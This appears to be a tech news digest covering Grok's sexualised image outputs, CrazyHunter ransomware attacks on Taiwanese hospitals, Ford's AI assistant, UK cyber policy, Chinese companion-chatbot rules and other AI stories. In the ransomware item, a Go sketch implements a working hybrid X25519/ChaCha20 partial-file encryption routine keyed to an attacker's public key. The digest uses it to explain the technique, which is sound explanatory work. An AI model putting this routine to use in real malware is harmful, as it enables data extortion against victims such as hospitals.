Elon Musk’s Grok chatbot has triggered international backlash after generating sexualised images of women and girls in response to user prompts on X, raising renewed concerns over AI safeguards and platform accountability.
The images, some depicting minors in minimal clothing, circulated publicly before being removed. Grok later acknowledged failures in its own safeguards, stating that child sexual abuse material is illegal and prohibited, while xAI initially offered no public explanation.
European officials reacted swiftly. French ministers referred the matter to prosecutors, calling the output illegal, while campaigners in the UK argued the incident exposed delays in enforcing laws against AI-generated intimate images.
In contrast, US lawmakers largely stayed silent despite xAI holding a major defence contract. Musk did not directly address the controversy, instead posting unrelated content as criticism mounted on the platform.
The episode has intensified debate over whether current AI governance frameworks are sufficient to prevent harm, particularly when generative systems operate at scale with limited real-time oversight.
CrazyHunter ransomware has emerged as a growing threat to healthcare organisations, with repeated attacks targeting hospitals and medical service providers. The campaign focuses on critical healthcare infrastructure, raising concerns about service disruption and the exposure of sensitive patient data.
The malware is developed in Go and demonstrates a high level of technical maturity. Attackers gain initial access by exploiting weak Active Directory credentials, then use Group Policy Objects to distribute the ransomware rapidly across compromised networks.
Healthcare institutions in Taiwan have been among the most affected, with multiple confirmed incidents reported by security researchers. The pattern suggests a targeted campaign rather than opportunistic attacks, increasing pressure on regional healthcare providers to strengthen defences.
Once deployed, CrazyHunter disables security tools to conceal its activity and then encrypts files. Analysts note extensive evasion techniques, including memory-based execution and redundant encryption routines that act as fallbacks, ensuring the payload runs even if one method is blocked.
CrazyHunter employs a hybrid encryption scheme that combines ChaCha20 and elliptic curve cryptography, encrypting only part of each file to speed up the attack. Encrypted files receive a ‘.Hunter’ extension, and recovery depends on the attackers’ private keys, reinforcing the pressure to pay ransoms.
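The general pattern is worth unpacking: hybrid schemes pair a fast symmetric cipher with an asymmetric key exchange, so files can be encrypted quickly on the victim’s machine while decryption stays gated on a private key only the attackers hold. The Go sketch below illustrates that pattern with X25519 and ChaCha20-Poly1305 plus head-only partial encryption; it is a simplified illustration of the technique analysts describe, not CrazyHunter’s actual code, and every name in it is invented.

```go
// Illustrative sketch only, not CrazyHunter's actual code: a hybrid
// scheme pairs X25519 key agreement with ChaCha20-Poly1305, and only
// the head of each file is encrypted ("partial encryption").
package main

import (
	"crypto/rand"
	"fmt"

	"golang.org/x/crypto/chacha20poly1305"
	"golang.org/x/crypto/curve25519"
)

// encryptHead seals the first chunkSize bytes of data against an
// attacker-held X25519 public key and returns the blob that would be
// written back to disk: ephPub || nonce || sealed head || plaintext tail.
func encryptHead(data, attackerPub []byte, chunkSize int) ([]byte, error) {
	// Ephemeral keypair: the private half is discarded, so only the
	// holder of the matching attacker private key can re-derive the key.
	ephPriv := make([]byte, 32)
	if _, err := rand.Read(ephPriv); err != nil {
		return nil, err
	}
	ephPub, err := curve25519.X25519(ephPriv, curve25519.Basepoint)
	if err != nil {
		return nil, err
	}
	// The raw shared secret doubles as the symmetric key in this sketch;
	// a real scheme would run it through a KDF such as HKDF first.
	key, err := curve25519.X25519(ephPriv, attackerPub)
	if err != nil {
		return nil, err
	}
	aead, err := chacha20poly1305.New(key)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, aead.NonceSize())
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	if chunkSize > len(data) {
		chunkSize = len(data)
	}
	// Partial encryption: sealing only the head ruins large files fast,
	// yet recovery still requires the attacker's private key.
	out := append(append(ephPub, nonce...), aead.Seal(nil, nonce, data[:chunkSize], nil)...)
	return append(out, data[chunkSize:]...), nil
}

func main() {
	// Stand-in for the public key that would ship inside the binary.
	attackerPriv := make([]byte, 32)
	rand.Read(attackerPriv)
	attackerPub, _ := curve25519.X25519(attackerPriv, curve25519.Basepoint)

	blob, _ := encryptHead([]byte("patient record contents ..."), attackerPub, 16)
	fmt.Printf("would be renamed with a .Hunter extension, %d bytes\n", len(blob))
}
```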
Ford has unveiled plans for an AI assistant that will launch in its smartphone app in early 2026 before expanding to in-vehicle systems in 2027. The announcement was made at the 2026 Consumer Electronics Show, alongside a preview of a next-generation BlueCruise driver assistance system.
The AI assistant will be hosted on Google Cloud and built using existing large language models, with access to vehicle-specific data. Ford said this will allow users to ask both general questions, such as vehicle capacity, and real-time queries, including oil life and maintenance status.
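Ford has not published implementation details, but the behaviour it describes matches a common tool-augmented assistant pattern: static questions go straight to the language model, while real-time queries are first enriched with live vehicle data. The minimal Go sketch below shows that routing under those assumptions; every function and field name in it is invented for illustration.

```go
// Hypothetical sketch of the pattern Ford describes: the assistant
// routes general questions straight to a hosted language model, while
// real-time queries are first grounded in live vehicle data. Every
// name below (Telemetry, fetchTelemetry, askModel) is invented.
package main

import (
	"fmt"
	"strings"
)

// Telemetry stands in for the vehicle-specific signals mentioned in
// the announcement, such as oil life and maintenance status.
type Telemetry struct {
	OilLifePct     int
	MaintenanceDue bool
}

// fetchTelemetry is a placeholder for a call to a vehicle-data backend.
func fetchTelemetry(vin string) Telemetry {
	return Telemetry{OilLifePct: 62, MaintenanceDue: false}
}

// askModel is a placeholder for a hosted large-language-model call.
func askModel(prompt string) string {
	return "model answer for: " + prompt
}

// answer injects current vehicle state into the prompt when the query
// concerns real-time status, so the model can ground its reply.
func answer(vin, query string) string {
	q := strings.ToLower(query)
	if strings.Contains(q, "oil") || strings.Contains(q, "maintenance") {
		t := fetchTelemetry(vin)
		return askModel(fmt.Sprintf("%s [oil life %d%%, maintenance due: %t]",
			query, t.OilLifePct, t.MaintenanceDue))
	}
	return askModel(query) // general questions, e.g. vehicle capacity
}

func main() {
	fmt.Println(answer("VIN-EXAMPLE", "How much oil life is left?"))
}
```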
Ford plans to introduce the assistant first through its redesigned mobile app, with native integration into vehicles scheduled for 2027. The company has not yet specified which models will receive the in-car version first, but said the rollout would expand gradually across its lineup.
Alongside the AI assistant, the vehicle manufacturer previewed an updated version of its BlueCruise system, which it claims will be more affordable to produce and more capable. The new system is expected to debut in 2027 on the first electric vehicle built on Ford’s low-cost Universal Electric Vehicle platform.
Ford said the next-generation BlueCruise could support eyes-off driving by 2028 and enable point-to-point autonomous driving under driver supervision. As with similar systems from other automakers, drivers will still be required to remain ready to take control at any time.
The UK government has announced new measures to strengthen the security and resilience of online public services as more interactions with the state move online. Ministers say public confidence is essential as citizens increasingly rely on digital systems for everyday services.
Backed by more than £210 million, the UK Government Cyber Action Plan outlines how cyber defences and digital resilience will be improved across the public sector. A new Government Cyber Unit will coordinate risk identification, incident response, and action on complex threats spanning multiple departments.
The plan underpins wider efforts to digitise public services, including benefits applications, tax payments, and healthcare access. Officials argue that secure systems can reduce bureaucracy and improve efficiency, but only if users trust that their data is protected.
The announcement coincides with parliamentary debate on the Cyber Security and Resilience Bill, which sets clearer expectations for companies supplying services to the government. The legislation is intended to strengthen cyber resilience across critical supply chains.
Ministers also highlighted new steps to address software supply chain risks, including a Software Security Ambassador Scheme promoting basic security practices. The government says stronger cyber resilience is essential to protect public services and maintain public trust.
China’s cyberspace regulator has proposed new limits on AI ‘boyfriend’ and ‘girlfriend’ chatbots, tightening oversight of emotionally interactive artificial intelligence services.
Draft rules released on 27 December would require platforms to intervene when users express suicidal or self-harm tendencies, while strengthening protections for minors and restricting harmful content.
The regulator defines the services as AI systems that simulate human personality traits and emotional interaction. The proposals are open for public consultation until 25 January.
The draft bans chatbots from encouraging suicide, engaging in emotional manipulation, or producing obscene, violent, or gambling-related content. Minors would need guardian consent to access AI companionship.
Platforms would also be required to disclose clearly that users are interacting with AI rather than humans. Legal experts in China warn that enforcement may be challenging, particularly in identifying suicidal intent through language cues alone.
More players are now turning to AI tools to help manage their Fantasy Premier League squads. Several popular apps use AI to rate teams, predict player points, and suggest transfers, with developers reporting rapid growth in both free and paid users.
Fantasy football has long allowed fans to test their instincts by building virtual teams and competing against friends or strangers. In recent years, the game has developed a large ecosystem of content creators offering advice on transfers, tactics, and player performance.
Supporters of the tools say they make the game more engaging and accessible. Some players argue that AI advice is no different from following tips on podcasts or social media and see it as a way to support decision-making rather than replace skill.
Critics, however, say AI removes key elements of instinct, luck, and banter. Some fans describe AI-assisted play as unfair or against the spirit of fantasy football leagues, while others worry it leads to increasingly similar teams driven by the same data.
Despite the debate, surveys suggest a growing share of fantasy players plan to use AI this season. League organisers and game developers are experimenting with incentives to reward creative picks, as the role of AI in fantasy football continues to expand.
A Guardian investigation has found that Google’s AI Overviews have displayed false and misleading health information that could put people at risk of harm. The summaries, which appear at the top of search results, are generated using AI and are presented as reliable snapshots of key information.
The investigation identified multiple cases where Google’s AI summaries provided inaccurate medical advice. Examples included incorrect guidance for pancreatic cancer patients, misleading explanations of liver blood test results, and false information about women’s cancer screening.
Health experts warned that such errors could lead people to dismiss symptoms, delay treatment, or follow harmful advice. Some charities said the summaries lacked essential context and could mislead users during moments of anxiety or crisis.
Concerns were also raised about inconsistencies, with the same health queries producing different AI-generated answers at different times. Experts said this variability undermines trust and increases the risk that misinformation will influence health decisions.
Google said most AI Overviews are accurate and helpful, and that the company continually improves quality, particularly for health-related topics. It said action is taken when summaries misinterpret content or lack appropriate context.
Manus has returned to the spotlight after agreeing to be acquired by Meta in a deal reportedly worth more than $2 billion. The transaction is one of the most high-profile acquisitions of an Asian AI startup by a US technology company and reflects Meta’s push to expand agentic AI capabilities across its platforms.
The startup drew attention in March after unveiling an autonomous AI agent designed to execute tasks such as résumé screening and stock analysis. Developed by the AI product studio Butterfly Effect, Manus was founded in China and later moved its headquarters to Singapore.
Since launch, Manus has expanded its features to include design work, slide creation, and browser-based task completion. The company reported surpassing $100 million in annual recurring revenue and raised $75 million earlier this year at a valuation of about $500 million.
Meta said the acquisition would allow it to integrate the Singapore-based company’s technology into its wider AI strategy while keeping the product running as a standalone service. Manus said subscriptions would continue uninterrupted and that operations would remain based in Singapore.
The deal has drawn political scrutiny in the US due to Manus’s origins and past links to China. Meta said the transaction would sever remaining ties to China, as debate intensifies over investment, data security, and competition in advanced AI systems.
Illinois Secretary of State Alexi Giannoulias has warned residents to stay alert for fraudulent text messages claiming unpaid traffic violations or tolls. Officials say the messages are part of a phishing campaign targeting Illinois drivers.
The scam texts typically warn recipients that their vehicle registration or driving privileges are at risk of suspension. The messages urge immediate action via links designed to steal money or harvest personal information.
The Secretary of State’s office said it sends text messages only to remind customers about scheduled DMV appointments. It does not communicate by text about licence status, vehicle registration issues, or enforcement actions.
Officials advised residents not to click on links or provide personal details in response to such messages. The texts are intended to create fear and pressure victims into acting quickly.
Residents who receive scam messages are encouraged to report them to the Federal Trade Commission through its online fraud reporting system.
China has proposed stringent new rules for AI aimed at protecting children and preventing chatbots from providing advice that could lead to self-harm, violence, or gambling.
The draft regulations, published by the Cyberspace Administration of China (CAC), require developers to include personalised settings, time limits, and parental consent for services offering emotional companionship.
High-risk chats involving self-harm or suicide must be passed to a human operator, with guardians or emergency contacts alerted. AI providers must not produce content that threatens national security, harms national honour, or undermines national unity.
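The draft describes an escalation flow rather than an implementation, but the required behaviour can be sketched. The Go outline below shows one plausible shape, in which a risk classifier triggers a human handoff and a guardian alert; the classifier, handoff, and notification hooks are all hypothetical, and, as the legal experts quoted earlier note, the classification step is the genuinely hard part.

```go
// Hypothetical sketch of the escalation flow the draft rules describe:
// flagged self-harm messages trigger a human handoff and a guardian or
// emergency-contact alert. All names here are invented for illustration.
package main

import (
	"fmt"
	"strings"
)

type RiskLevel int

const (
	RiskNone RiskLevel = iota
	RiskSelfHarm
)

// classify stands in for whatever model a platform would deploy; a
// keyword check like this is far too crude in practice, which is
// exactly the enforcement difficulty experts point to.
func classify(msg string) RiskLevel {
	lower := strings.ToLower(msg)
	for _, cue := range []string{"hurt myself", "end my life"} {
		if strings.Contains(lower, cue) {
			return RiskSelfHarm
		}
	}
	return RiskNone
}

// Stubs for the platform-side actions the draft would mandate.
func escalateToHuman(userID, msg string) { fmt.Println("operator takes over session for", userID) }
func notifyGuardian(userID string)       { fmt.Println("guardian or emergency contact alerted for", userID) }

func handleMessage(userID, msg string) string {
	if classify(msg) == RiskSelfHarm {
		escalateToHuman(userID, msg)
		notifyGuardian(userID)
		return "Connecting you with a person who can help."
	}
	// Normal companion reply; the rules also require disclosing that
	// the respondent is an AI rather than a human.
	return "AI companion: " + msg
}

func main() {
	fmt.Println(handleMessage("user-42", "I want to end my life"))
}
```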
The rules come as AI usage surges, with platforms such as DeepSeek, Z.ai, and Minimax attracting millions of users in China and abroad. The CAC says it supports safe uses of AI, including tools promoting local culture and companionship for the elderly.
The move reflects growing global concerns over AI’s impact on human behaviour. Notably, OpenAI has faced legal challenges over alleged chatbot-related harm, prompting the company to create roles focused on tracking AI risks to mental health and cybersecurity.
China’s draft rules signal a firm approach to regulating AI technology as its influence expands rapidly.